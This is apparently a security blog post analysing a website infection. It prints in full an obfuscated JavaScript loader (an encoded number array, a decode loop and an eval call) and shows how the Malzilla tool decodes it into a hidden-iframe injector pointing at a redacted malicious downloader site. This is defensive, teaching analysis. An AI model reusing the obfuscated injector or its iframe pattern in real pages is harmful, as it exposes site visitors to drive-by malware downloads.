try{1-prototype;}catch(asd){x=2;} if(x){f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,94,98,89,87,101,93,101,112,36,98,105,88,86,106,95,88,37,89,100,100,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2,0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,95,96,90,88,99,94,102,110,37,99,103,89,87,104,96,89,35,90,101,98,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100,91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Co"+"de":"");zx=((e)?"fromChar":"")+z;for(i=0;575-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x&&f&&012===10)e(s);
Deobfuscating this by hand isn't much fun if you're not a JavaScript programmer. Fortunately, getting the clear text result of this block of code is as easy as copying and pasting it into Malzilla's Decoder tab (or putting the URL into the Download tab). Malzilla will prompt you to save the downloaded script into a text file for evaluation, if you use the second method. But if your IDS has already captured the data content, the Decoder function will work fine.
Here's the result:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://(redacted)
document.getElementsByTagName('body')[0].appendChild(f);
We can now see the code was a hidden iframe, pointing to a malicious downloader site, which fortunately is no longer up.
The secondary benefit of this is as a teaching tool. If you don't speak JavaScript, you can look at the obfuscated code block and the decoded result and begin to learn how the methods are working. Well, maybe.
No comments:
Post a Comment